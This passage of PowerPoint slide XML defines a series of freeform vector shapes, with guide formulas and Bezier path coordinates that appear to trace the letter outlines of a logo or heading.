                    <a:gd name="connsiteX13" fmla="*/ 34195 w 161925"/>
                    <a:gd name="connsiteY13" fmla="*/ 123539 h 209550"/>
                    <a:gd name="connsiteX14" fmla="*/ 34385 w 161925"/>
                    <a:gd name="connsiteY14" fmla="*/ 30004 h 209550"/>
                    <a:gd name="connsiteX15" fmla="*/ 90011 w 161925"/>
                    <a:gd name="connsiteY15" fmla="*/ 30004 h 209550"/>
                    <a:gd name="connsiteX16" fmla="*/ 124015 w 161925"/>
                    <a:gd name="connsiteY16" fmla="*/ 62103 h 209550"/>
                    <a:gd name="connsiteX17" fmla="*/ 90583 w 161925"/>
                    <a:gd name="connsiteY17" fmla="*/ 95631 h 209550"/>
                    <a:gd name="connsiteX18" fmla="*/ 34385 w 161925"/>
                    <a:gd name="connsiteY18" fmla="*/ 95631 h 209550"/>
                    <a:gd name="connsiteX19" fmla="*/ 34385 w 161925"/>
                    <a:gd name="connsiteY19" fmla="*/ 30004 h 209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61925" h="209550">
                      <a:moveTo>
                        <a:pt x="34385" y="123539"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="84773" y="123539"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="116300" y="123539"/>
                        <a:pt x="123635" y="140589"/>
                        <a:pt x="123635" y="179165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123635" y="189452"/>
                        <a:pt x="123635" y="200977"/>
                        <a:pt x="128873" y="210026"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="165544" y="210026"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="158115" y="201454"/>
                        <a:pt x="154877" y="179165"/>
                        <a:pt x="154877" y="154686"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154877" y="121444"/>
                        <a:pt x="137636" y="112014"/>
                        <a:pt x="125825" y="110300"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="125825" y="109728"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="132112" y="107347"/>
                        <a:pt x="158115" y="97060"/>
                        <a:pt x="158115" y="56769"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="158115" y="21146"/>
                        <a:pt x="136208" y="0"/>
                        <a:pt x="93440" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="210122"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34195" y="210122"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34195" y="123539"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="34385" y="30004"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="90011" y="30004"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="107823" y="30004"/>
                        <a:pt x="124015" y="35338"/>
                        <a:pt x="124015" y="62103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124015" y="84201"/>
                        <a:pt x="112204" y="95631"/>
                        <a:pt x="90583" y="95631"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="34385" y="95631"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34385" y="3000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59" name="자유형: 도형 91">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B814711-DEDA-1C44-9C5B-F358E643367C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7422616" y="2762165"/>
                  <a:ext cx="104775" cy="142875"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 82106 w 104775"/>
                    <a:gd name="connsiteY0" fmla="*/ 65627 h 142875"/>
                    <a:gd name="connsiteX1" fmla="*/ 43910 w 104775"/>
                    <a:gd name="connsiteY1" fmla="*/ 55055 h 142875"/>
                    <a:gd name="connsiteX2" fmla="*/ 28099 w 104775"/>
                    <a:gd name="connsiteY2" fmla="*/ 37433 h 142875"/>
                    <a:gd name="connsiteX3" fmla="*/ 52388 w 104775"/>
                    <a:gd name="connsiteY3" fmla="*/ 19622 h 142875"/>
                    <a:gd name="connsiteX4" fmla="*/ 80963 w 104775"/>
                    <a:gd name="connsiteY4" fmla="*/ 43815 h 142875"/>
                    <a:gd name="connsiteX5" fmla="*/ 104108 w 104775"/>
                    <a:gd name="connsiteY5" fmla="*/ 43815 h 142875"/>
                    <a:gd name="connsiteX6" fmla="*/ 53245 w 104775"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 142875"/>
                    <a:gd name="connsiteX7" fmla="*/ 4858 w 104775"/>
                    <a:gd name="connsiteY7" fmla="*/ 40291 h 142875"/>
                    <a:gd name="connsiteX8" fmla="*/ 34195 w 104775"/>
                    <a:gd name="connsiteY8" fmla="*/ 75057 h 142875"/>
                    <a:gd name="connsiteX9" fmla="*/ 73724 w 104775"/>
                    <a:gd name="connsiteY9" fmla="*/ 86392 h 142875"/>
                    <a:gd name="connsiteX10" fmla="*/ 84677 w 104775"/>
                    <a:gd name="connsiteY10" fmla="*/ 103251 h 142875"/>
                    <a:gd name="connsiteX11" fmla="*/ 56674 w 104775"/>
                    <a:gd name="connsiteY11" fmla="*/ 124016 h 142875"/>
                    <a:gd name="connsiteX12" fmla="*/ 23146 w 104775"/>
                    <a:gd name="connsiteY12" fmla="*/ 94679 h 142875"/>
                    <a:gd name="connsiteX13" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY13" fmla="*/ 94679 h 142875"/>
                    <a:gd name="connsiteX14" fmla="*/ 55245 w 104775"/>
                    <a:gd name="connsiteY14" fmla="*/ 143637 h 142875"/>
                    <a:gd name="connsiteX15" fmla="*/ 107918 w 104775"/>
                    <a:gd name="connsiteY15" fmla="*/ 100584 h 142875"/>
                    <a:gd name="connsiteX16" fmla="*/ 82106 w 104775"/>
                    <a:gd name="connsiteY16" fmla="*/ 65627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04775" h="142875">
                      <a:moveTo>
                        <a:pt x="82106" y="65627"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="75248" y="63532"/>
                        <a:pt x="45911" y="55626"/>
                        <a:pt x="43910" y="55055"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34481" y="52388"/>
                        <a:pt x="28099" y="46958"/>
                        <a:pt x="28099" y="37433"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28099" y="23622"/>
                        <a:pt x="41624" y="19622"/>
                        <a:pt x="52388" y="19622"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68294" y="19622"/>
                        <a:pt x="79820" y="26194"/>
                        <a:pt x="80963" y="43815"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="104108" y="43815"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="104108" y="15240"/>
                        <a:pt x="80963" y="0"/>
                        <a:pt x="53245" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29337" y="0"/>
                        <a:pt x="4858" y="12859"/>
                        <a:pt x="4858" y="40291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4858" y="54483"/>
                        <a:pt x="11525" y="68675"/>
                        <a:pt x="34195" y="75057"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52388" y="80201"/>
                        <a:pt x="64389" y="82772"/>
                        <a:pt x="73724" y="86392"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79058" y="88487"/>
                        <a:pt x="84677" y="92774"/>
                        <a:pt x="84677" y="103251"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84677" y="113633"/>
                        <a:pt x="77057" y="124016"/>
                        <a:pt x="56674" y="124016"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38100" y="124016"/>
                        <a:pt x="23146" y="115729"/>
                        <a:pt x="23146" y="94679"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="94679"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="572" y="128683"/>
                        <a:pt x="25051" y="143637"/>
                        <a:pt x="55245" y="143637"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="81629" y="143637"/>
                        <a:pt x="107918" y="131350"/>
                        <a:pt x="107918" y="100584"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107918" y="86392"/>
                        <a:pt x="99536" y="71056"/>
                        <a:pt x="82106" y="65627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0" name="자유형: 도형 92">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80D7B4E4-29D5-AD40-97B2-50FF367DB0E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7550728" y="2765404"/>
                  <a:ext cx="95250" cy="133350"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 23241 w 95250"/>
                    <a:gd name="connsiteY0" fmla="*/ 76295 h 133350"/>
                    <a:gd name="connsiteX1" fmla="*/ 90011 w 95250"/>
                    <a:gd name="connsiteY1" fmla="*/ 76295 h 133350"/>
                    <a:gd name="connsiteX2" fmla="*/ 90011 w 95250"/>
                    <a:gd name="connsiteY2" fmla="*/ 56674 h 133350"/>
                    <a:gd name="connsiteX3" fmla="*/ 23241 w 95250"/>
                    <a:gd name="connsiteY3" fmla="*/ 56674 h 133350"/>
                    <a:gd name="connsiteX4" fmla="*/ 23241 w 95250"/>
                    <a:gd name="connsiteY4" fmla="*/ 20765 h 133350"/>
                    <a:gd name="connsiteX5" fmla="*/ 95345 w 95250"/>
                    <a:gd name="connsiteY5" fmla="*/ 20765 h 133350"/>
                    <a:gd name="connsiteX6" fmla="*/ 95345 w 95250"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY7" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX8" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY8" fmla="*/ 137160 h 133350"/>
                    <a:gd name="connsiteX9" fmla="*/ 96679 w 95250"/>
                    <a:gd name="connsiteY9" fmla="*/ 137160 h 133350"/>
                    <a:gd name="connsiteX10" fmla="*/ 96679 w 95250"/>
                    <a:gd name="connsiteY10" fmla="*/ 116396 h 133350"/>
                    <a:gd name="connsiteX11" fmla="*/ 23241 w 95250"/>
                    <a:gd name="connsiteY11" fmla="*/ 116396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95250" h="133350">
                      <a:moveTo>
                        <a:pt x="23241" y="76295"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="90011" y="76295"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="90011" y="56674"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23241" y="56674"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23241" y="20765"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95345" y="20765"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95345" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="137160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="96679" y="137160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="96679" y="116396"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23241" y="11639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1" name="자유형: 도형 93">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9DE1AE5-8724-4942-8D7D-4F4DA38A720D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7660551" y="2762165"/>
                  <a:ext cx="114300" cy="142875"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 63437 w 114300"/>
                    <a:gd name="connsiteY0" fmla="*/ 124016 h 142875"/>
                    <a:gd name="connsiteX1" fmla="*/ 23146 w 114300"/>
                    <a:gd name="connsiteY1" fmla="*/ 71819 h 142875"/>
                    <a:gd name="connsiteX2" fmla="*/ 63437 w 114300"/>
                    <a:gd name="connsiteY2" fmla="*/ 19622 h 142875"/>
                    <a:gd name="connsiteX3" fmla="*/ 96488 w 114300"/>
                    <a:gd name="connsiteY3" fmla="*/ 46863 h 142875"/>
                    <a:gd name="connsiteX4" fmla="*/ 119634 w 114300"/>
                    <a:gd name="connsiteY4" fmla="*/ 46863 h 142875"/>
                    <a:gd name="connsiteX5" fmla="*/ 63437 w 114300"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 142875"/>
                    <a:gd name="connsiteX6" fmla="*/ 0 w 114300"/>
                    <a:gd name="connsiteY6" fmla="*/ 71819 h 142875"/>
                    <a:gd name="connsiteX7" fmla="*/ 63437 w 114300"/>
                    <a:gd name="connsiteY7" fmla="*/ 143637 h 142875"/>
                    <a:gd name="connsiteX8" fmla="*/ 119825 w 114300"/>
                    <a:gd name="connsiteY8" fmla="*/ 88106 h 142875"/>
                    <a:gd name="connsiteX9" fmla="*/ 97155 w 114300"/>
                    <a:gd name="connsiteY9" fmla="*/ 88106 h 142875"/>
                    <a:gd name="connsiteX10" fmla="*/ 63437 w 114300"/>
                    <a:gd name="connsiteY10" fmla="*/ 124016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4300" h="142875">
                      <a:moveTo>
                        <a:pt x="63437" y="124016"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35052" y="124016"/>
                        <a:pt x="23146" y="98107"/>
                        <a:pt x="23146" y="71819"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23146" y="45530"/>
                        <a:pt x="35052" y="19622"/>
                        <a:pt x="63437" y="19622"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82677" y="19622"/>
                        <a:pt x="92583" y="31147"/>
                        <a:pt x="96488" y="46863"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="119634" y="46863"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="116872" y="17335"/>
                        <a:pt x="93345" y="191"/>
                        <a:pt x="63437" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23717" y="0"/>
                        <a:pt x="0" y="32671"/>
                        <a:pt x="0" y="71819"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="110966"/>
                        <a:pt x="23717" y="143637"/>
                        <a:pt x="63437" y="143637"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="95536" y="143637"/>
                        <a:pt x="118015" y="120968"/>
                        <a:pt x="119825" y="88106"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="97155" y="88106"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="95345" y="108109"/>
                        <a:pt x="84011" y="124016"/>
                        <a:pt x="63437" y="124016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2" name="자유형: 도형 94">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12386763-FFEB-DA4C-9338-461DC2BE8325}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7800187" y="2765404"/>
                  <a:ext cx="104775" cy="133350"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 54198 w 104775"/>
                    <a:gd name="connsiteY0" fmla="*/ 140399 h 133350"/>
                    <a:gd name="connsiteX1" fmla="*/ 108585 w 104775"/>
                    <a:gd name="connsiteY1" fmla="*/ 87821 h 133350"/>
                    <a:gd name="connsiteX2" fmla="*/ 108585 w 104775"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX3" fmla="*/ 85440 w 104775"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX4" fmla="*/ 85440 w 104775"/>
                    <a:gd name="connsiteY4" fmla="*/ 79915 h 133350"/>
                    <a:gd name="connsiteX5" fmla="*/ 54293 w 104775"/>
                    <a:gd name="connsiteY5" fmla="*/ 119634 h 133350"/>
                    <a:gd name="connsiteX6" fmla="*/ 23146 w 104775"/>
                    <a:gd name="connsiteY6" fmla="*/ 79915 h 133350"/>
                    <a:gd name="connsiteX7" fmla="*/ 23146 w 104775"/>
                    <a:gd name="connsiteY7" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX8" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX9" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY9" fmla="*/ 87725 h 133350"/>
                    <a:gd name="connsiteX10" fmla="*/ 54198 w 104775"/>
                    <a:gd name="connsiteY10" fmla="*/ 140399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4775" h="133350">
                      <a:moveTo>
                        <a:pt x="54198" y="140399"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="86868" y="140399"/>
                        <a:pt x="108585" y="122968"/>
                        <a:pt x="108585" y="87821"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="108585" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="85440" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="85440" y="79915"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="85440" y="98393"/>
                        <a:pt x="84297" y="119634"/>
                        <a:pt x="54293" y="119634"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24289" y="119634"/>
                        <a:pt x="23146" y="98298"/>
                        <a:pt x="23146" y="79915"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="23146" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="87725"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-95" y="122873"/>
                        <a:pt x="21527" y="140399"/>
                        <a:pt x="54198" y="140399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3" name="자유형: 도형 95">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C3E04F-E0C4-BD4D-A7D1-83F20272824A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7935443" y="2765499"/>
                  <a:ext cx="104775" cy="133350"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY0" fmla="*/ 137065 h 133350"/>
                    <a:gd name="connsiteX1" fmla="*/ 23146 w 104775"/>
                    <a:gd name="connsiteY1" fmla="*/ 137065 h 133350"/>
                    <a:gd name="connsiteX2" fmla="*/ 23146 w 104775"/>
                    <a:gd name="connsiteY2" fmla="*/ 80581 h 133350"/>
                    <a:gd name="connsiteX3" fmla="*/ 57245 w 104775"/>
                    <a:gd name="connsiteY3" fmla="*/ 80581 h 133350"/>
                    <a:gd name="connsiteX4" fmla="*/ 83629 w 104775"/>
                    <a:gd name="connsiteY4" fmla="*/ 116872 h 133350"/>
                    <a:gd name="connsiteX5" fmla="*/ 87154 w 104775"/>
                    <a:gd name="connsiteY5" fmla="*/ 137065 h 133350"/>
                    <a:gd name="connsiteX6" fmla="*/ 112014 w 104775"/>
                    <a:gd name="connsiteY6" fmla="*/ 137065 h 133350"/>
                    <a:gd name="connsiteX7" fmla="*/ 104775 w 104775"/>
                    <a:gd name="connsiteY7" fmla="*/ 100965 h 133350"/>
                    <a:gd name="connsiteX8" fmla="*/ 85153 w 104775"/>
                    <a:gd name="connsiteY8" fmla="*/ 72009 h 133350"/>
                    <a:gd name="connsiteX9" fmla="*/ 85153 w 104775"/>
                    <a:gd name="connsiteY9" fmla="*/ 71628 h 133350"/>
                    <a:gd name="connsiteX10" fmla="*/ 107061 w 104775"/>
                    <a:gd name="connsiteY10" fmla="*/ 37052 h 133350"/>
                    <a:gd name="connsiteX11" fmla="*/ 63246 w 104775"/>
                    <a:gd name="connsiteY11" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX12" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY12" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX13" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY13" fmla="*/ 137065 h 133350"/>
                    <a:gd name="connsiteX14" fmla="*/ 23241 w 104775"/>
                    <a:gd name="connsiteY14" fmla="*/ 19526 h 133350"/>
                    <a:gd name="connsiteX15" fmla="*/ 60865 w 104775"/>
                    <a:gd name="connsiteY15" fmla="*/ 19526 h 133350"/>
                    <a:gd name="connsiteX16" fmla="*/ 83820 w 104775"/>
                    <a:gd name="connsiteY16" fmla="*/ 40481 h 133350"/>
                    <a:gd name="connsiteX17" fmla="*/ 61150 w 104775"/>
                    <a:gd name="connsiteY17" fmla="*/ 62389 h 133350"/>
                    <a:gd name="connsiteX18" fmla="*/ 23241 w 104775"/>
                    <a:gd name="connsiteY18" fmla="*/ 62389 h 133350"/>
                    <a:gd name="connsiteX19" fmla="*/ 23241 w 104775"/>
                    <a:gd name="connsiteY19" fmla="*/ 19526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04775" h="133350">
                      <a:moveTo>
                        <a:pt x="0" y="137065"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="23146" y="137065"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23146" y="80581"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57245" y="80581"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="78581" y="80581"/>
                        <a:pt x="83629" y="91726"/>
                        <a:pt x="83629" y="116872"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83629" y="123634"/>
                        <a:pt x="83629" y="131064"/>
                        <a:pt x="87154" y="137065"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="112014" y="137065"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="106966" y="131540"/>
                        <a:pt x="104775" y="116872"/>
                        <a:pt x="104775" y="100965"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104775" y="79248"/>
                        <a:pt x="93059" y="73152"/>
                        <a:pt x="85153" y="72009"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="85153" y="71628"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="89440" y="70104"/>
                        <a:pt x="107061" y="63341"/>
                        <a:pt x="107061" y="37052"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107061" y="13811"/>
                        <a:pt x="92202" y="0"/>
                        <a:pt x="63246" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="137065"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="23241" y="19526"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="60865" y="19526"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="72961" y="19526"/>
                        <a:pt x="83820" y="22955"/>
                        <a:pt x="83820" y="40481"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83820" y="54864"/>
                        <a:pt x="75819" y="62389"/>
                        <a:pt x="61150" y="62389"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="23241" y="62389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23241" y="19526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4" name="자유형: 도형 96">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65E1DFCD-3CA3-4144-8099-F84A931DFE77}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8066030" y="2765404"/>
                  <a:ext cx="19050" cy="133350"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 19050"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX1" fmla="*/ 23146 w 19050"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX2" fmla="*/ 23146 w 19050"/>
                    <a:gd name="connsiteY2" fmla="*/ 137065 h 133350"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 19050"/>
                    <a:gd name="connsiteY3" fmla="*/ 137065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050" h="133350">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="23146" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23146" y="137065"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="13706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5" name="자유형: 도형 97">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA442639-3E76-AA42-AAE2-1CD64AB790C8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8104987" y="2765404"/>
                  <a:ext cx="104775" cy="133350"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY0" fmla="*/ 20765 h 133350"/>
                    <a:gd name="connsiteX1" fmla="*/ 41910 w 104775"/>
                    <a:gd name="connsiteY1" fmla="*/ 20765 h 133350"/>
                    <a:gd name="connsiteX2" fmla="*/ 41910 w 104775"/>
                    <a:gd name="connsiteY2" fmla="*/ 137160 h 133350"/>
                    <a:gd name="connsiteX3" fmla="*/ 65151 w 104775"/>
                    <a:gd name="connsiteY3" fmla="*/ 137160 h 133350"/>
                    <a:gd name="connsiteX4" fmla="*/ 65151 w 104775"/>
                    <a:gd name="connsiteY4" fmla="*/ 20765 h 133350"/>
                    <a:gd name="connsiteX5" fmla="*/ 107252 w 104775"/>
                    <a:gd name="connsiteY5" fmla="*/ 20765 h 133350"/>
                    <a:gd name="connsiteX6" fmla="*/ 107252 w 104775"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY7" fmla="*/ 0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04775" h="133350">
                      <a:moveTo>
                        <a:pt x="0" y="20765"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="41910" y="20765"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="41910" y="137160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="65151" y="137160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="65151" y="20765"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="107252" y="20765"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10725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6" name="자유형: 도형 98">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE33690-2D35-F446-93F7-BA507A85AC15}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8212429" y="2765404"/>
                  <a:ext cx="114300" cy="133350"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 61913 w 114300"/>
                    <a:gd name="connsiteY0" fmla="*/ 61436 h 133350"/>
                    <a:gd name="connsiteX1" fmla="*/ 26860 w 114300"/>
